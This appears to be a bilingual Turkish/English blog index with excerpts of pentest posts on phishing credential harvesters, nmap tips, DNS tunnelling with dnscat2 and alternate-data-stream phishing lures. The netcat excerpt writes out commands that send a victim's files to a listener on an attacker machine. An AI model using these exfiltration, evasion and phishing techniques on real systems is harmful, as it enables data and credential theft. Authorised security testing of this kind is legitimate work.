Basit Bir Oltalama (Parola Toplayıcı) Web Sitesi Şablonu

Bildiğiniz gibi, Kali Linux içinde Social Engineering Toolkit ile birlikte gelmektedir. Bu aracı kullanarak hedef bir web sitesinin giriş ekranını klonlayarak kendi bilgisayarınızdan yayınlamanız ve bu şekilde kullanıcı adı ve parola bilgilerini çekmeniz mümkün olmaktadır. Ancak birçok defa işler bu kadar basit yürümemekte. Birçok site kendisinin bu şekilde kopyalanmasına müsaade etmemekte. Benzer bir durum çok yakında bir sızma testi ortamında bizzat başıma geldi. Burada sizinle buna yönelik kullanmış olduğum şablon bir web sitesi kaynak kodunu paylaşmak istiyorum.

A Simple Phishing (Credential Harvester) Website Template

As you already know, Kali Linux comes with Social Engineering Toolkit where you can clone the sign-in page of a target website and start hosting that site from your own machine to retrieve the credentials. But sometimes this may simply not work. The website may be protected somehow against automatic cloning. This happened to me on a recent pentest case. There it becomes necessary to make our hands dirty and prepare the phishing page manually.

Korunmalı Ortamlardaki Sızma Testlerinde Kullanılmak Üzere Bazı Komutlar ve Parametreleri

Kısa bir zaman önce uluslararası bir siber tatbikatta kırmızı takım üyesi olarak yer alma fırsatı buldum. Görevimiz, güvenlik duvarı ve saldırı tespit sistemleri tarafından korunmakta olan bir ağ ortamındaki mavi takımlara saldırarak sızma testi yapmaktı. Bu ortamda kullandığım bazı bilinen komut ve yararlı parametrelerini sizlerle paylaşmak istiyorum: Sızma testinin ilk zor aşaması, çalışan host bilgisayarları ve üzerlerinde çalışan servisleri tespit etmektir. Bu kapsamda kullandığım en işe yarar nmap parametresi, taramayı özel bir port üzerinde kısıtlayacak şekilde olandı:

Some Command Parameters for Pentesting Protected Environments

Recently I participated in an international cyber exercise as part of the red team. Our mission was to do as much as possible onto a network protected by blue teams with firewalls, IDS and SIEM solutions. I want to share here some small tips regarding parameters of some well-known commands: As part ot the pentesting, the first challenge lies in discovering the live hosts and their running services. The most fruitful nmap parameter for me was limiting the search on a distinct port:

Netcat ile Dosya Aktarma

Netcat küçük ama çok kullanışlı bir araçtır, öyle ki kullanıcıya bir bilgisayardan başka bir bilgisayara dosya aktarma imkanı bile verir. Bunun için; Saldırgan bilgisayarda dinleyici listener açmanızın ardından: nc -l 3333 > received_file Kurban taraftan dosya aktarmak için yapmanız gereken aşağıdaki şekilde netcat’i çalıştırmaktır: nc domain 3333 < original_file Peki, kurban bilgisayardaki dosyaların ne olduğunu bilmiyorsak ne yapmalıyız? Burada da akla gelen en kolay yöntem tabi ki dosyaları bir adla zip ya da tar formatında sıkıştırmak.

Transferring Files with netcat

Netcat is a very handy tool, it even allows the user transfering a file. Once you start a listener as below on attacker computer: nc -l 3333 > received_file You can send a file to the attacker computer as follows: nc domain 3333 < original_file What if you don’t know the file name on the victim system before the attack? The easiest way is to zip or tar files on victim computer first.

dnscat2 Üzerinden DNS Tünelleme

Bir sızma testçisinin karşılaştığı en büyük zorluklardan biri, sistemin içinden güvenlik duvarı ve saldırı tespit sistemlerini atlatarak dışarıyla iletişim kurmaktır. DNS tünelleme, böylesi ortamlardaki güvenlik mekanizmalarını atlatmak için oltukça etkin bir çözümdür. Dnscat2 isimli araç DNS tünelleme maksadıyla kullanılabilecek oldukça popüler bir araçtır. Dnscat2 aracını kendi bilgisayarınıza ya da buluttaki bir sunucuya yükleyebilirsiniz. Örneğin Digital Ocean ortamından bir sunucu kiralayabilir ve orada Ubuntu droplet (droplet makineniz için gereken root parolasını e-posta üzerinden temin edeceksiniz) yararabilirsiniz.

DNS Tunneling with dnscat2

One of the challenges of a pentester is to communicate through firewalls and IDS from inside a system. DNS Tunneling is a very effective technique for overcoming this kind of protection mechanisms. Dnscat2 is a very popular tool for DNS Tunneling. You can install your dnscat2 server on your own machine or on a machine in the cloud. You can hire a virtual server on Digital Ocean and create an Ubuntu droplet there (You’ll receive root password for your droplet machine over e-mail).

Alternate Data Streams ile Oltalama Saldırısı Hazırlamak

Son zamanlarda siber dünyanın vahşi cangıllarında çok ilginç oltalama saldırılarına tanık oldum. Bunların bir kısmı, karmaşıklaştırılmış (obfuscated) Javascript kodu ile uzaktaki bir Komuta&Kontrol bilgisayarına bağlanıp oradan çok daha etkili bir zararlı yazılımı indirmeyi amaçlıyordu. Benzer bir mantıkla, bu çalışmamızda biz de bir zararlı yazılımı uzaktaki bir KK bilgisayarına bağlanamaya gerek olmadan, doğrudan bir text dosyasının içinden çekerek çalıştıracağız. Anket konulu oltalama senaryomuzda, karşı tarafa içinde dört (ikisi tercihen gizli/hidden hale getirilmiş) dosya bulunan ziplenmiş bir klasör göndereceğiz.

Creating a Phishing Attack by Utilizing Alternate Data Streams

Recently I’ve been witnessing phishing attacks containing malicious Javascript files which call a more sophisticated malware from a Command & Control server in the wild. This kind of attacks seem to continue in coming years. Let’s investigate the possibility of embedding a malware into a text file and calling it from Javascript without the need of a CC server. In our scenario, we assume that we are sending four files (two of them preferrably hidden) inside a zipped directory as part of a Poll research: